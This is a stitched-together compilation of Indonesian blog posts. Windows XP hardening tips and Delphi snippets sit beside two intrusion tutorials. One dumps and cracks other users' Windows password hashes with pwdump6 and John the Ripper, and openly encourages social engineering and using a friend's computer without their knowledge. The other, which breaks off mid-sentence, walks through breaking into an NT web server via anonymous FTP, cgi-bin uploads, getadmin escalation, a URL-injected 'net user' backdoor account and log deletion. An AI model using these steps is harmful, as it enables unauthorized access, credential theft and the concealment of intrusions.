hubungan langsung tersebut. Dalam hal ini router dapat menempatkan aplikasi tersebut dalam zona bebas firewall (Demilitarized Zone, DMZ). Tetapi hati-hati: Semua PC dalam zona ini memberi akses kepada siapa pun. Karena itu, sebaiknya instalasikan software firewall khusus untuk setiap PC dalam DMZ.

Bisa saja setelah segala langkah pengamanan dilakukan masih ada juga hacker yang lolos masuk ke dalam sistem. Namun, dengan trik berikut Anda dapat membatasi ruang geraknya dalam windows sejak awal. Pengguna Windows XP biasanya bekerja dengan hak administrator—sama dengan hacker. Karena itu, sebaiknya gunakan 2 account: Satu untuk bekerja, satu untuk ke Internet. Account untuk berselancar di Internet sebaiknya memiliki hak terbatas untuk mengurangi risiko. Dengan cara ini, hacker tak dapat mengubah banyak hal pada sistem.
Untuk membuat kedua account tersebut, klik ‘Start | Settings | Control Panel | User Accounts’. Pilih ‘Create a new account’ dan masukkan sebuah nama untuk account baru tersebut. Setelah mengklik ‘Next’, tandai ‘Limited’ dan klik ‘Create account’. Anda dapat berpindah dari satu account ke yang lainnya melalui ‘Start | Logoff’ dan mengklik ‘Switch User’.

- Menghapus Account Windows yang Tak Berguna
Secara default, dalam Windows XP terinstalasi beberapa account pengguna yang dapat dikontak dan dimanfaatkan oleh trojan. Karenanya, matikan semua account yang tak dibutuhkan ini.
Untuk menyingkirkan account yang tak diperlukan, klik ‘Start | Settings | Control Panel | Administrativie Tools | Computer Management’. Pilih ‘Local Users and Groups’ lalu klik ganda ‘Users’ di bagian kanan. Hapus semua account yang tidak Anda butuhkan untuk bekerja, terutama account ‘Microsoft Support User’. Account ‘Guest’ dan ‘Administrator’ tidak dapat dihapus. Namun, Anda dapat meningkatkan proteksi dengan mengganti namanya atau mendeaktivasinya dengan mengaktifkan pilihan ‘Account is disabled’. Untuk mengganti nama account ini, dalam menu klik ‘Start | Settings | Control Panel | Administrative Tools |
Local Security Policy’. Pada ‘Local Policies | Security Options’ klik ganda ‘Accounts:
Rename administrator account’. Pilih nama lain, misalnya ‘User Top Banget’ dan konfirmasi dengan mengklik ‘OK’. Lakukan hal yang sama untuk account ‘Guest’. Ubah namanya melalui entri ‘Accounts: Rename guest account’ menjadi ‘Tamoe’, misalnya.
- Mematikan Layanan Remote Assistance
Untuk menjaga komputer dan jaringan rumah Anda dari pengambilalihan, sebaiknya Anda juga mematikan layanan Remote Assistance. Layanan ini digunakan oleh administrator jaringan untuk
mengatur dan mengubah konfigurasi sistem dalam sebuah jaringan besar. Dengan Remote Assistance, sebuah komputer dapat diatur konfigurasinya tanpa kita perlu berada di depan komputer tersebut. Namun, layanan ini seringkali dianggap sebagai undangan terbuka untuk para hacker. Untuk menutup celah keamanan ini, klik kanan ‘My Computer’ di desktop lalu pilih ‘Properties.’ Dalam jendela ‘System Properties’ aktifkan halaman ‘Remote’ dan singkirkan hacker dengan mematikan pilihan ‘Allow Remote Assistance invitations to be sent from this computer’. Matikan juga pilihan ‘Allow users to connect remotely to this computer’.
Proteksi Profesional
Dalam langkah pertama Anda telah melindungi computer dengan baik. Untuk menutupi celah terakhir yang masih ada, dan membuat hacker berkeringat dingin, sebaiknya Anda mengikuti tip dalam langkah perngamanan tingkat tinggi berikut ini.
- Membagi IP dan mengatur konfigurasi subnet-mask
Setiap komputer dalam sebuah jaringan memiliki alamat IP yang berbeda-beda. Dalam sebuah jaringan rumah, alamat IP ini biasanya diberikan dalam format 192.168.x.x. Dalam Windows XP, Anda dapat menetapkan alamat IP ini melalui ‘Start | Settings| Control Panel | Network Connections.’ Klik kanan ‘Local Area Connection’ dan pilih ‘Properties’. Klik dua kali ‘Internet Protocol (TCP/IP) lalu aktifkan pilihan ‘Use the following IP address’. Isi kolom ‘IP address’ dengan 192.168.0.1 dan kolom ‘Subnet mask’ dengan 255.255.255.0, lalu konfirmasikan dengan mengklik OK. Lakukan prosedur yang sama pada setiap komputer dalam
jaringan. Isi dengan nilai yang sama untuk kolom ‘Subnet mask’. Namun, untuk kolom ‘IP address’ berikan nilai yang berurutan: 192.168.0.2 untuk komputer kedua, dan seterusnya.
Jika dalam jaringan rumah Anda terdapat banyak komputer klien, sebaiknya Anda mencatat alamat IP dari masing-masing komputer tersebut. Catatan ini akan sangat berguna di kemudian hari, misalnya saat menginstalasi ulang.

- Mematikan Fungsi Layanan Kritis
Jika sudah menyangkut keamanan, sebaiknya Anda mematikan dua layanan sistem:
Messenger dan NetMeeting Remote Desktop Sharing. Messenger dirancang untuk pengiriman berita internal antara klien dan server. Layanan ini sebenarnya tidak berbahaya bagi data Anda, tetapi banyak layanan spam yang menumpang jalur komunikasi ini untuk menyebarkan pesan-pesan iklannya. Sedangkan layanan NetMeeting Remote Desktop Sharing memungkinkan akses langsung ke
komputer Anda dari jarak jauh. Klik ‘Start | Settings | Control Panel | Administrative Tools | Services’. Di sini Anda akan menemukan penjelasan ringkas tentang semua komponen yang terinstalasi dalam sistem Windows XP. Klik dua kali item ‘Messenger’ dan dalam ‘Startup type’ pilih ‘Disabled’. Klik ‘Stop’ untuk menghentikan layanan yang sedang berlangsung, lalu konfirmasikan perubahan dengan mengklik OK. Jalankan prosedur yang sama untuk mematikan
layanan NetMeeting Remote Desktop Sharing.
- Menginstalasi firewall dengan sempurna
Sebuah firewall merupakan perisai yang sangat berguna dalam menangkal para hacker profesional. Namun, sebelumnya ia memerlukan beberapa ‘fine tuning’. Konfigurasi standar yang diberikan sebuah firewall biasanya merupakan titik awal yang baik, tetapi Anda tetap harus melakukan secara manual jika ingin secara eksplisit menutup satu port tertentu. Saya akan menunjukkan kepada Anda, bagaimana menjadikan pertahanan komputer Anda sekuat Benteng Fort Knox dengan beberapa langkah sederhana. Prinsip dasar dan nomor-nomor port-nya berlaku untuk semua program firewall dari produsen mana pun. Bagaimana langkah tepatnya, silakan
Anda baca manual program firewall yang Anda gunakan. Hak akses untuk program yang telah terinstalasi: Aturan yang paling sederhana menjadi aturan terpenting: Jangan berikan akses Internet pada software yang tidak Anda percayai. Karena itu, sebelumnya Anda harus mencabut hak akses dari semua aplikasi yang ada dalam komputer Anda. Awalnya, banyak program yang akan ‘protes’ dan tidak mau bekerja dengan sempurna. Namun, hanya dengan cara ini Anda dapat menyaring dan menentukan aplikasi mana saja yang benar-benar berhak mengakses Internet.
Jalankan McAfee Firewall dan pilih ‘Configuration Assistant’ di bawah ‘Task’. Pilih ‘Filter all traffic’ lalu klik ‘Next’. Hadang hacker dengan mematikan pilihan ‘Allow other computers to access my shares’. Klik Next sekali lagi. Dalam langkah berikutnya, Anda akan menutup
kemungkinan masuknya hacker melalui program. Beri akses Internet hanya pada program yang benarbenar Anda percayai. Atau, cabut saja akses Internet dari semua program kecuali McAfee Firewall-nya sendiri. Tolak atau berikan hak akses ketika program memintanya: Hati-hati dalam memutuskan program mana yang akan Anda beri akses. Salah-salah, program yang berguna tidak dapat lagi bekerja dengan sempurna. Menutup port: Penutupan port merupakan pekerjaan yang cukup rumit. Jika terlalu banyak port yang diblokir, akan banyak pula aplikasi yang tidak dapat bekerja dengan benar. Sebaliknya, jika banyak port yang terbuka, komputer Anda dapat menjadi sasaran serangan. Secara umum, sebaiknya Anda hanya membuka port yang memang benar-benar diperlukan. Dalam keperluan sehari-hari, biasanya yang perlu dibuka
hanya port untuk keperluan berselancar dan email, yaitu port 80 (HTTP), 443 (HTTPS), 21 (FTP), 110 (POP3), dan 25 (SMTP). Jika suatu aplikasi memerlukan port lainnya, biasanya Anda akan menemukan catatan mengenai hal itu dalam manual, online help, atau di website produsennya. Setelah mengetahui port mana saja yang diperlukan, Anda dapat membukanya dalam McAfee Firewall. Pilih ‘Control Internet programs’ di bawah kolom Task. Di jendela sebelah kanan, Anda pilih program yang akan diberi hak akses: Sebagai contoh kita ambil Internet Explorer. Pilih ‘Filter this program’s access to the Internet (recommended)’ lalu klik ‘Customize’. Hapus semua aturan filter yang disediakan dengan mengklik ‘Remove’ lalu klik ‘Add’. Pilih ‘Allow communication by remote port’ dan konfirmasikan dengan mengklik Next. Dalam jendela berikutnya, klik link ‘Click here to select’ dan berikan nilai 80. Konfirmasikan dengan mengklik OK dua kali. Pilih ‘And communicating with direction’, klik link ‘Click here to select’ yang muncul di bidang atas, lalu berikan ‘Outbound’ sebagai nilainya. Klik OK sekali. Sekarang aktifkan ‘And communicating using protocols’, klik link ‘Click here to select’, pilih TCP/IP, dan klik OK dua kali. Sekarang, klik lagi tombol ‘Add’ dan pilih ‘Allow communication by protocol’, lalu klik Next. Klik link ‘Click here to select’, pilih UDP/IP, klik OK. Tundukkan hacker dengan memilih ‘And communicating using remote ports’, klik link ‘Click here to select’, dan isikan 1024-5000. Setelah itu, klik OK dua kali. Terakhir, pilih ‘And communicating with direction’, klik link ‘Click here to select’, pilih ‘Outbound’. Klik OK dua kali, lalu klik Apply untuk menerapkan aturan filter yang telah dibuat tadi. Sekarang Anda boleh merasa yakin bahwa jaringan Anda telah aman dari serangan hacker. Informasi: Anda dapat menemukan penjelasan tentang semua port penting dan aplikasi-aplikasi yang menggunakannya di website www.portsdb.org. Daftar port yang digunakan dalam berbagai layanan WindowsXP/ 2000 dapat dilihat di http://www.microsoft.com/windows-2000/techinfo/reskit/samplechapters/cnfc/cnfc_por_simw.asp.

» Menangkal ‘pembajak radio’ secara efektif
‘War Driving’ merupakan salah satu ‘olah raga berselancar’ yang digemari para hacker. Bersenjatakan notebook dan WLAN, para ‘war driver’ ini berkelana dan mencari jaringan radio. Ketika menemukannya, ia akan masuk dan berselancar atas biaya pemilik jaringan, yang sama sekali tak mengetahuinya. Para hacker jenis ini biasanya baru ketahuan jika ia iseng merusak beberapa file. Ada metoda efektif untuk menangkal hal tersebut, yaitu dengan mengenkripsi jaringan Anda. Kemampuan untuk itu dimiliki oleh hampir semua Access-Point W-LAN. Anehnya, standar radio IEEE 802.11 melarang aktivasi enkripsi oleh produsen sehingga Anda perlu
melakukannya sendiri. Panduan berikut ini berfungsi serupa pada hampir semua W-LAN.
1. Dalam Wired Equivalent Privacy (WEP), tentukan setting untuk enkripsi. Sedapatnya gunakan enkripsi 128 bit dan cantumkan sebuah password. Dengan demikian, W-LAN Anda terlindung
cukup baik dari penyusup.
2. Selain itu, perintahkan router untuk hanya menerima nomor perangkat (alamat MAC) adaptor W-LAN sendiri. Alamat ini biasanya tercantum di sisi bawah adapter atau dapat ditemukan
melalui software. Untuk itu klik ‘Start | Programs | Accessories | Command Prompt’ dan berikan perintah ‘netstat -r’ atau ‘getmac’. Di samping alamat IP, di sini Anda dapat menemukan alamat MAC.
3. Terakhir, Anda perlu mendeaktivasi nama jaringan, yaitu ‘SSID’-nya W-LAN. Dengan demikian, pengguna wireless lain di sekitar tidak akan melihat jaringan Anda, sehingga tidak akan berusaha menyerang. Pilihan ini biasanya berbunyi ‘Hide SSID’.

» Amankah PC Anda?
Kini PC Anda sudah terlindungi. Namun, apakah firewall-nya benar-benar berfungsi seperti yang dijanjikan? Uji sendiri tingkat keamanannya. Untuk itu, berbagai website di Internet menawarkan bantuan. Celah-celah yang ada dapat ditemukan dan ditambal.
Hati-hati: Seperti biasanya, di Internet ada juga website dengan layanan palsu. Ia tidak hanya mencari celah, tetapi juga sekalian memasukkan virus atau perusak lainnya melalui
celah yang ditemukan. Karena itu, untuk keperluan pengujian ini saya menyarankan Hackerwatch. Di sini tersedia advanced portcheck dan banyak tes lainnya yang dijamin serius.
Info: www.hackerwatch.org/probe

Hack Windows XP (SP2) Passwords

Hack Windows XP (SP2) Passwords

Apakah anda pernah menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi) komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun seperti Cain, L0pthCrack, dsb. Hanya dibutuhkan sedikit ‘kepercayaan’ untuk meminjam komputer (istilah kerennya social engineering) dan 2 buah program, yaitu pwdump6 dan john the ripper. Tapi klo kebetulan ada login umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login teman lagi :-D.
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :

Syskey is a Windows feature that adds an additional encryption layer to the password hashes stored in the SAM database. The main purpose of this feature is to deter ‘offline’ attack. In fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good password crackers to “recover” the passwords; of course physical access is almost always required. So with syskey the attacker needs to remove the additional encryption layer to get the password hashes.

Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2 cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

A significantly modified version of pwdump3e, this program is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is turned on. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file

Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup, tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat login terlebih dulu.

Jika udah punya akses dengan login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6. Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada pergi, siapa tahu berguna suatu saat.. :-D. Ok, langsung aja kita jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari sini atau download dari mirror situs saya disini.

1. Jalankan CMD (Run->cmd)

2. Jalankan pwdump6 seperti berikut (misalnya PwDump6 berada di folder D:\PwDump6)

D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1

pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net

This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.

Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed.

3. Setelah itu akan didapatkan file pass.txt yang berisi daftar user dan password yang masih dienkripsi. Contohnya akan tampak seperti berikut :

ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B:::

4. Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti “adminkeren”, “qwerty123″, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti “P4ssW0rD”, “S03S4h”, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.

Download John The Ripper untuk Windows disini. Untuk komputer yang menggunakan Prosesor AMD, sebaiknya menggunakan “john-mmx.exe”. Atau bagi yang menggunakan intel atau AMD, dapat menggunakan “John-386.exe”. Sebelumnya copy file pass.txt ke dalam folder tempat “John-mmx.exe” atau “John-386.exe” berada (John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan tunggu dengan sabar :

D:\john171w\john1701\run>john-mmx.exe pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)

Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user “Administrator” adalah “adminkeren123″, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.

Administrator:1+Administrator:2 = adminkeren123

Sedangkan untuk user “coba” adalah “mudahditebak”!!

Mudah bukan? Intinya sih tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu crack hasilnya dengan John The Ripper.

Nah, sekarang kalau kita mau pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja langsung user Admin lagi, tapi jangan sampai ketahuan ama dia….. :-D Atau klo anda lupa password Administrator, tidak perlu mereboot komputer, lalu mereset password anda. Tinggal ikut langkah2 diatas aja!

...check if I am connected to the internet ?

...check if I am connected to the internet ?

interface
uses
Windows, SysUtils, Registry, WinSock, WinInet;

type
TConnectionType = (ctNone, ctProxy, ctDialup);

function ConnectedToInternet : TConnectionType;
function RasConnectionCount : Integer;


implementation

//For RasConnectionCount =======================
const
cERROR_BUFFER_TOO_SMALL = 603;
cRAS_MaxEntryName = 256;
cRAS_MaxDeviceName = 128;
cRAS_MaxDeviceType = 16;
type
ERasError = class(Exception);

HRASConn = DWord;
PRASConn = ^TRASConn;
TRASConn = record
dwSize: DWORD;
rasConn: HRASConn;
szEntryName: Array[0..cRAS_MaxEntryName] Of Char;
szDeviceType : Array[0..cRAS_MaxDeviceType] Of Char;
szDeviceName : Array [0..cRAS_MaxDeviceName] of char;
end;

TRasEnumConnections =
function (RASConn: PrasConn; { buffer to receive Connections data }
var BufSize: DWord; { size in bytes of buffer }
var Connections: DWord { number of Connections written to buffer }
): LongInt; stdcall;
//End RasConnectionCount =======================


function ConnectedToInternet: TConnectionType;
var
Reg : TRegistry;
bUseProxy : Boolean;
UseProxy : LongWord;
begin
Result := ctNone;
Reg := TRegistry.Create;
with REG do
try
try
RootKey := HKEY_CURRENT_USER;
if OpenKey('\Software\Microsoft\Windows\CurrentVersion\Internet settings',False) then begin
//I just try to read it, and trap an exception
if GetDataType('ProxyEnable') = rdBinary then
ReadBinaryData('ProxyEnable', UseProxy, SizeOf(LongWord) )
else begin
bUseProxy := ReadBool('ProxyEnable');
if bUseProxy then
UseProxy := 1
else
UseProxy := 0;
end;
if (UseProxy <> 0) and ( ReadString('ProxyServer') <> '' ) then Result := ctProxy;
end;
except
//Obviously not connected through a proxy
end;
finally
Free;
end;

//We can check RasConnectionCount even if dialup networking is not installed
//simply because it will return 0 if the DLL is not found.
if Result = ctNone then begin
if RasConnectionCount > 0 then Result := ctDialup;
end;
end;

function RasConnectionCount : Integer;
var
RasDLL : HInst;
Conns : Array[1..4] of TRasConn;
RasEnums : TRasEnumConnections;
BufSize : DWord;
NumConns : DWord;
RasResult : Longint;
begin
Result := 0;

//Load the RAS DLL
RasDLL := LoadLibrary('rasapi32.dll');
if RasDLL = 0 then exit;

try
RasEnums := GetProcAddress(RasDLL,'RasEnumConnectionsA');
if @RasEnums = nil then
raise ERasError.Create('RasEnumConnectionsA not found in rasapi32.dll');

Conns[1].dwSize := Sizeof (Conns[1]);
BufSize := SizeOf(Conns);

RasResult := RasEnums(@Conns, BufSize, NumConns);

If (RasResult = 0) or (Result = cERROR_BUFFER_TOO_SMALL) then Result := NumConns;
finally
FreeLibrary(RasDLL);
end;
end;

...change screen resolution ?

{
The function NewRes can have the following result:

DISP_CHANGE_SUCCESSFUL The settings change was successful.
DISP_CHANGE_RESTART The computer must be restarted in order for the graphics mode to work.
DISP_CHANGE_BADFLAGS An invalid set of flags was passed in.
DISP_CHANGE_FAILED The display driver failed the specified graphics mode.
DISP_CHANGE_BADMODE The graphics mode is not supported.
DISP_CHANGE_NOTUPDATED Windows NT only: Unable to write settings to the registry.
}

{
Folgene Rückgabewerte sind für NewRes möglich:

DISP_CHANGE_SUCCESSFUL Auflösung geändert
DISP_CHANGE_RESTART Computer muss neugestartet werden
DISP_CHANGE_BADFLAGS Falsche Flags
DISP_CHANGE_FAILED Fehler in Grafiktreiber
DISP_CHANGE_BADMODE Auflösung nicht unterstützt
DISP_CHANGE_NOTUPDATED Windows NT: Einstellungen konnten nicht in die Registry geschrieben werden
}

function NewRes(XRes,YRes:DWord):integer;
var
DevMode:TDeviceMode;
begin
EnumDisplaySettings(nil, 0, DevMode);
DevMode.dmFields:=DM_PELSWIDTH or DM_PELSHEIGHT;
DevMode.dmPelsWidth:=XRes;
DevMode.dmPelsHeight:=YRes;
Result:=ChangeDisplaySettings(DevMode, 0);
end;

procedure TForm1.Button1Click(Sender: TObject);
begin
if NewRes(1024,768)=DISP_CHANGE_SUCCESSFUL then
begin
ShowMessage('Resolution changed.');
end;
end;

Delphi 5 Easter Egg

Are there any easter eggs in Delphi?
Answer:


I know that this isn't the kind of technical article you would expect to see from delphi3000.com, but many people asked if there aren't any 'easter eggs' in Delphi. Here goes:

In Delphi 5 (I've seen it work in unpatched-Enterprise version, but I think it's the same for all) open the About box...
Hold Alt and type in JEDI or DEVELOPERS or TEAM or QUALITY.

After the large DELPHI word scrolls off the screen you will see:
- a praise to the Joint Endeavour of Delphi Innovators (and a link to their site in the About box) or
- the names of the developers / team / QA that made Delphi such a great product

While the "Star Wars" type scrolling in still on you can use the down (or the up) key to turn the scrolling text until it is
upside down, and now you should now see the message:
"Use the Source, Luke"

...disable / enable / hide / show taskbar ?



This is very easy. All that you have to do is obtain the window handle
of the taskbar window and then you can disable or hide it.
The window handle is obtained like this :

var
HTaskbar : HWND;
begin
HTaskBar:=FindWindow('Shell_TrayWnd',nil);

Now you have the window handle, you can use it to disable or hide the taskbar :

EnableWindow(HTaskBar,False); //Disable the taskbar
EnableWindow(HTaskBar,True); //Enable the taskbar
ShowWindow(HTaskbar,SW_HIDE); //Hide the taskbar
ShowWindow(HTaskbar,SW_SHOW); //Show the taskbar

Resep Cepat : Menggasak NT dari jauh

Resep Cepat : Menggasak NT dari jauh



oleh putra_leppindo

Pingin iseng nyobain ngehack NT? Ingat selalu: "UNIX bukanlah segalanya!" Justru sekarang makin banyak perusahaan-perusahaan, bahkan ISP-ISP besar (seperti indo.net) yang menjadikan NT platform pilihan untuk webhosting mereka. Nah, berikut sedikit info dari pengalaman gue ngisengin server NT, dengan info-info sebagian besar dicolong dari berbagai "newbie textfile".


Bahan-bahan
===========
Mesin yang lumayan (sekitar 486-66 keatas)
Sistem operasi Windows NT (nggak mutlak, tapi jelas lebih sedap kalo
nge-hack lewat OS yang sama - toh CD bajakan banyak beredar dimana-mana).
Sebuah webbrowser (sebaiknya IE, supaya hack kita betul-betul 100%
Microsoft-sponsored heheheh …).

RAS dan koneksi dialup ke internet.
Jangan lupa file-file:
GetAdmin.exe dan file dukungan gasys.dll
L0phtCrack
(semua tersedia di http://www.chacosite.com/download//)


Mulai NgeHack
=============
Mulai seperti biasa, dengan membuka koneksi ke ISP kamu. Setelah itu, buka jendela "Command Prompt", dan mulai bekerja. Anggap kita sudah tahu bahwa www.company.com menjalankan IIS (untuk daftar target, coba cari lewat search engine yang memanfaatkan spider (altavista, excite). Biasanya file help IIS ikut terdokumentasi disitu. Nah, sekarang kita coba (untung-untungan, nih) untuk ftp ke server tersebut:

C:\ftp www.company.com

connected to www.company.com

220 manado Microsoft FTP Service (Version 3.0)

User (www.company.com:(none)):

Koneksi ini memberikan info yang cukup penting: Nama NetBIOS dari sang server: MANADO. Dari sini bisa kita ketahui nama dari account internet anonimus yang digunakan oleh NT untuk menjalankan layanan WWW, FTP, dan Gopher di mesin tersebut.

Jika account default belum diganti, dan memang jarang sekali account seperti ini diganti, biasanya account internet anonimusnya adalah:
IUSR_SATURN. Informasi ini akan kita perlukan di masa yang akan datang saat kita mencoba mencuri akses Administrator ke dalam sang mesin. Nah, coba masukkan "anonymous" sebagai nama user:

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

Nah, terkadang ada juga gunanya kita masukkan "guest" sebelum mencoba "anonymous" sebagai username. Secara default, akses "guest" di NT tertutup, namun ada saja SysAdmin tolol yang membuka akses "guest" dan biasanya dibarengi dengan password "guest" atau malah kosong sama sekali.
Nah, jika kamu berhasil masuk ke layanan FTP sang server melalui account ini, maka segala yang bisa diakses oleh "guest", bisa juga diakses olehmu.

Dapat akses
===========
Sekarang kita sudah bisa mengakses site target, tapi jalan masih panjang. Untuk selanjutnya, kita coba untuk mengetik "cd /c" di prompt ftp. Banyak admin yang membuat root direktori C:\ dijadikan direktori ftp virtual dan membiarkan "alias name"-nya "/c" sebagai default. Sekarang coba kita "put"
file ke direktori tersebut. Kalau emang nasib kamu bagus, maka kamu punya akses "write" ke direktori tersebut! Selanjutnya, kamu bisa seperti biasa me="dir" untuk melihat - lihat isi dari server sasaran kamu. Kalau kebetulan kamu melihat direktori "cgi-bin", maka jelas langkar pertama adalah tertawa terbahak-bahak, sebab sang Webmaster dari mesin ini rupanya meletakkan direktori ini bersama file-file websitenya (mungkin dengan tujuan agar dia bisa melakukan "remote changes" terhadap situs web tsb.)


CGI-BIN mempunyai perizinan "Execute", yang artinya segala program di direktori cgi-bin bisa dieksekusi melalui web browser kita. Seringkali kita terbentur, jika sang Webmaster menggunakan NTFS file-level security, maka mustahil bagi kita untuk masuk ke cgi-bin lewat akses anonimus.

Ganti direktori ke CGI-BIN ("cd cgi-bin") dan persiapkan ftp untuk transmisi file tipe biner ("binary"). Nah, coba kirim file cmd.exe ("put cmd.exe"). Jika ladyluck masih menemani, kamu akan melihat:

200 PORT command successful.

150 Opening BINARY mode data connection for CMD.EXE.

226 Transfer complete.

208144 bytes sent in 0.06 seconds (3469.07 Kbytes/sec)

Lanjutkan dengan mengirimkan "getadmin.exe" dan "gasys.dll" ke direktori yang sama. Nah, setelah ketiga file ini ter-upload, tutup koneksi, dan silakan ngerokok dulu. Kalau kamu kebetulan punya account AOL atau ISP lain yang memanfaatkan proxy, segera koneksi kembali ke internet lewat ISP
tersebut (untuk menghindari dicatatnya alamat IP kamu oleh fasilitas logging NT). Tapi jangan terlalu khawatir, sebab saat kamu berhasil mendapatkan Administrator, maka kamu bisa menghapus segala jejak. Nah, sekarang bukalah browser kamu dan masukkan URL berikut:

http://www.company.com/cgi-bin/getadmin.exe?IUSR_MANADO

Setelah kira-kira 15 detik, akan muncul:

CGI Error

Wah, rupanya aplikasi CGI yang bersangkutan memberikan pesan error, dengan sedikit tambahan:

Congratulations , now account IUSR_MANADO have administrator rights!

Heheheh. Kamu baru saja menjadikan account anonimusmu berpangkat sama dengan sang administrator sistem lokal. Sekarang kamu bisa melakukan hal apapun yang kamu inginkan, namun, tugas pertama adalah membuat account untuk kamu sendiri supaya kamu bisa menghubungi mesin targetmu lewat Windows Explorer dan utilitas-utilitas administratif lainnya. Kamu tidak bisa menggunakan account IUSR_SATURN sebab kamu tidak tahu password acaknya.

Untuk membuat account baru, gunakan URL:

http://www.company.com/cgi-bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20iwan%20ngepet%20/add

Kamu baru saja berhasil membuat sebuah account bernama "iwan" dengan password "ngepet". Untuk membuat account kamu berpangkat administrator, maka kamu bisa menggunakan URL:


http://www.company.com/cgi-bin/getadmin.exe?iwan

Setelah itu, tinggal kita klik tombol "Start" dan lewat "Find" cari komputer yang bernama www.company.com. Setelah komputer tersebut ditemukan, kamu tinggal klik tombol kanan dan klik "Explore". Mesin kamu kan memulai NT Explorer dan kamu akan ditanya nama user dan password.
Masukkan "iwan" dan "ngepet" (atau nama manapun juga yang kamu berikan lewat URL diatas).

Sekarang kamu sudah terhubung ke mesin sasaran, dengan segala hak yang dimiliki oleh seorang admin. Dengan menggunakan "User Manager for Domains" kamu bisa mengambil seluruh informasi account; kamu bisa membuka "Internet Service Manager"; kamu bisa melihat "Server Manager"; namun sekarang mari kita coba untuk menghapus seluruh jejak. Lewat Eksplorer, pergilah ke
direktori Winnt\system32\logfiles dan hapus seluruh jejak kamu. Jika kamu mendapat pesan "sharing violation", cukup ganti tanggal komputer dengan URL:


http://www.company.com/cgi-bin/cmd.exe?/c%20date%2002/02/98

Dengan menggunakan "Registry Editor", buka registri mesin target kamu, dan dengan menggunakan L0phtcrack, "dump" informasi SAM (Security Accounts Manager) di mesin tersebut dan mulailah meng-crack seluruh password di dalam mesin tersebut. Karena L0phtCrack menghabiskan banyak tenaga CPU, jangan lupa untuk mengeset prioritasnya ke "Low" lewat Task Manager. Untuk
